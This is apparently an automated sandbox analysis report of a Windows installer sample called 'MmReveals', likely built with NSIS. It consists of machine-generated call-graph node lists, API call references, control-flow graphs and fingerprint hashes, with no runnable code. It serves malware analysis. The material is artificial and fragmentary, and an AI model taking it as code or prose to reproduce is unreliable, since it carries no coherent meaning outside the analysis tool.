GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4921 402a84 4922 401553 19 API calls 4921->4922 4923 402a8e 4922->4923 4924 401446 18 API calls 4923->4924 4925 402a98 4924->4925 4926 401a13 4925->4926 4927 402ab2 RegEnumKeyW 4925->4927 4928 402abe RegEnumValueW 4925->4928 4929 402a7e 4927->4929 4928->4926 4928->4929 4929->4926 4930 4029e4 RegCloseKey 4929->4930 4930->4926 4931 402c8a 4932 402ca2 4931->4932 4933 402c8f 4931->4933 4935 40145c 18 API calls 4932->4935 4934 401446 18 API calls 4933->4934 4937 402c97 4934->4937 4936 402ca9 lstrlenW 4935->4936 4936->4937 4938 402ccb WriteFile 4937->4938 4939 401a13 4937->4939 4938->4939 4940 40400d 4941 40406a 4940->4941 4942 40401a lstrcpynA lstrlenA 4940->4942 4942->4941 4943 40404b 4942->4943 4943->4941 4944 404057 GlobalFree 4943->4944 4944->4941 4945 401d8e 4946 40145c 18 API calls 4945->4946 4947 401d95 ExpandEnvironmentStringsW 4946->4947 4948 401da8 4947->4948 4950 401db9 4947->4950 4949 401dad lstrcmpW 4948->4949 4948->4950 4949->4950 4951 401e0f 4952 401446 18 API calls 4951->4952 4953 401e17 4952->4953 4954 401446 18 API calls 4953->4954 4955 401e21 4954->4955 4956 4030e3 4955->4956 4958 405f51 wsprintfW 4955->4958 4958->4956 4959 402392 4960 40145c 18 API calls 4959->4960 4961 402399 4960->4961 4964 4071f8 4961->4964 4965 406ed2 25 API calls 4964->4965 4966 407218 4965->4966 4967 407222 lstrcpynW lstrcmpW 4966->4967 4968 4023a7 4966->4968 4969 407254 4967->4969 4970 40725a lstrcpynW 4967->4970 4969->4970 4970->4968 4971 402713 4986 406009 lstrcpynW 4971->4986 4973 40272c 4987 406009 lstrcpynW 4973->4987 4975 402738 4976 40145c 18 API calls 4975->4976 4978 402743 4975->4978 4976->4978 4977 402752 4980 40145c 18 API calls 4977->4980 4982 402761 4977->4982 4978->4977 4979 40145c 18 API calls 4978->4979 4979->4977 4980->4982 4981 40145c 18 API calls 4983 40276b 4981->4983 4982->4981 4984 4062a3 11 API calls 4983->4984 4985 40277f WritePrivateProfileStringW 4984->4985 4986->4973 4987->4975 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4115 401a1f 4116 40145c 18 API calls 4115->4116 4117 401a26 4116->4117 4118 4062a3 11 API calls 4117->4118 4119 401a49 4118->4119 4120 401a64 4119->4120 4121 401a5c 4119->4121 4169 406009 lstrcpynW 4120->4169 4168 406009 lstrcpynW 4121->4168 4124 401a62 4128 406038 5 API calls 4124->4128 4125 401a6f 4126 406722 3 API calls 4125->4126 4127 401a75 lstrcatW 4126->4127 4127->4124 4130 401a81 4128->4130 4129 4062d5 2 API calls 4129->4130 4130->4129 4131 405e30 2 API calls 4130->4131 4133 401a98 CompareFileTime 4130->4133 4134 401ba9 4130->4134 4138 4062a3 11 API calls 4130->4138 4142 406009 lstrcpynW 4130->4142 4148 406805 18 API calls 4130->4148 4155 405ca0 MessageBoxIndirectW 4130->4155 4159 401b50 4130->4159 4166 401b5d 4130->4166 4167 405e50 GetFileAttributesW CreateFileW 4130->4167 4131->4130 4133->4130 4135 404f72 25 API calls 4134->4135 4137 401bb3 4135->4137 4136 404f72 25 API calls 4139 401b70 4136->4139 4140 40337f 37 API calls 4137->4140 4138->4130 4143 4062a3 11 API calls 4139->4143 4141 401bc6 4140->4141 4144 4062a3 11 API calls 4141->4144 4142->4130 4150 401b8b 4143->4150 4145 401bda 4144->4145 4146 401be9 SetFileTime 4145->4146 4147 401bf8 FindCloseChangeNotification 4145->4147 4146->4147 4149 401c09 4147->4149 4147->4150 4148->4130 4151 401c21 4149->4151 4152 401c0e 4149->4152 4154 406805 18 API calls 4151->4154 4153 406805 18 API calls 4152->4153 4156 401c16 lstrcatW 4153->4156 4157 401c29 4154->4157 4155->4130 4156->4157 4158 4062a3 11 API calls 4157->4158 4160 401c34 4158->4160 4161 401b93 4159->4161 4162 401b53 4159->4162 4163 405ca0 MessageBoxIndirectW 4160->4163 4164 4062a3 11 API calls 4161->4164 4165 4062a3 11 API calls 4162->4165 4163->4150 4164->4150 4165->4166 4166->4136 4167->4130 4168->4124 4169->4125 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4061 4021b5 4062 40145c 18 API calls 4061->4062 4063 4021bb 4062->4063 4064 40145c 18 API calls 4063->4064 4065 4021c4 4064->4065 4066 40145c 18 API calls 4065->4066 4067 4021cd 4066->4067 4068 40145c 18 API calls 4067->4068 4069 4021d6 4068->4069 4070 404f72 25 API calls 4069->4070 4071 4021e2 ShellExecuteW 4070->4071 4072 40221b 4071->4072 4073 40220d 4071->4073 4075 4062a3 11 API calls 4072->4075 4074 4062a3 11 API calls 4073->4074 4074->4072 4076 402230 4075->4076 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4077 401eb9 4078 401f24 4077->4078 4079 401ec6 4077->4079 4080 401f53 GlobalAlloc 4078->4080 4081 401f28 4078->4081 4082 401ed5 4079->4082 4089 401ef7 4079->4089 4083 406805 18 API calls 4080->4083 4088 4062a3 11 API calls 4081->4088 4093 401f36 4081->4093 4084 4062a3 11 API calls 4082->4084 4087 401f46 4083->4087 4085 401ee2 4084->4085 4090 402708 4085->4090 4095 406805 18 API calls 4085->4095 4087->4090 4091 402387 GlobalFree 4087->4091 4088->4093 4099 406009 lstrcpynW 4089->4099 4091->4090 4101 406009 lstrcpynW 4093->4101 4094 401f06 4100 406009 lstrcpynW 4094->4100 4095->4085 4097 401f15 4102 406009 lstrcpynW 4097->4102 4099->4094 4100->4097 4101->4087 4102->4090 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                          Executed Functions

                          Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                          APIs
                          • #17.COMCTL32 ref: 004038A2
                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                          • OleInitialize.OLE32(00000000), ref: 004038B4
                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                          • OleUninitialize.OLE32(?), ref: 00403AD1
                          • ExitProcess.KERNEL32 ref: 00403AF1
                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                          • API String ID: 2435955865-239407132
                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                          Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 625 4074bb-4074c0 626 4074c2-4074ef 625->626 627 40752f-407547 625->627 629 4074f1-4074f4 626->629 630 4074f6-4074fa 626->630 628 407aeb-407aff 627->628 634 407b01-407b17 628->634 635 407b19-407b2c 628->635 631 407506-407509 629->631 632 407502 630->632 633 4074fc-407500 630->633 636 407527-40752a 631->636 637 40750b-407514 631->637 632->631 633->631 638 407b33-407b3a 634->638 635->638 641 4076f6-407713 636->641 642 407516 637->642 643 407519-407525 637->643 639 407b61-407c68 638->639 640 407b3c-407b40 638->640 656 407350 639->656 657 407cec 639->657 645 407b46-407b5e 640->645 646 407ccd-407cd4 640->646 648 407715-407729 641->648 649 40772b-40773e 641->649 642->643 644 407589-4075b6 643->644 652 4075d2-4075ec 644->652 653 4075b8-4075d0 644->653 645->639 650 407cdd-407cea 646->650 654 407741-40774b 648->654 649->654 655 407cef-407cf6 650->655 658 4075f0-4075fa 652->658 653->658 659 40774d 654->659 660 4076ee-4076f4 654->660 661 407357-40735b 656->661 662 40749b-4074b6 656->662 663 40746d-407471 656->663 664 4073ff-407403 656->664 657->655 667 407600 658->667 668 407571-407577 658->668 669 407845-4078a1 659->669 670 4076c9-4076cd 659->670 660->641 666 407692-40769c 660->666 661->650 671 407361-40736e 661->671 662->628 676 407c76-407c7d 663->676 677 407477-40748b 663->677 682 407409-407420 664->682 683 407c6d-407c74 664->683 672 4076a2-4076c4 666->672 673 407c9a-407ca1 666->673 685 407556-40756e 667->685 686 407c7f-407c86 667->686 674 40762a-407630 668->674 675 40757d-407583 668->675 669->628 678 407c91-407c98 670->678 679 4076d3-4076eb 670->679 671->657 687 407374-4073ba 671->687 672->669 673->650 688 40768e 674->688 689 407632-40764f 674->689 675->644 675->688 676->650 684 40748e-407496 677->684 678->650 679->660 690 407423-407427 682->690 683->650 684->663 694 407498 684->694 685->668 686->650 692 4073e2-4073e4 687->692 693 4073bc-4073c0 687->693 688->666 695 407651-407665 689->695 696 407667-40767a 689->696 690->664 691 407429-40742f 690->691 698 407431-407438 691->698 699 407459-40746b 691->699 702 4073f5-4073fd 692->702 703 4073e6-4073f3 692->703 700 4073c2-4073c5 GlobalFree 693->700 701 4073cb-4073d9 GlobalAlloc 693->701 694->662 697 40767d-407687 695->697 696->697 697->674 704 407689 697->704 705 407443-407453 GlobalAlloc 698->705 706 40743a-40743d GlobalFree 698->706 699->684 700->701 701->657 707 4073df 701->707 702->690 703->702 703->703 709 407c88-407c8f 704->709 710 40760f-407627 704->710 705->657 705->699 706->705 707->692 709->650 710->674
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                          Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                          Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                          • FindClose.KERNEL32(00000000), ref: 004062EC
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 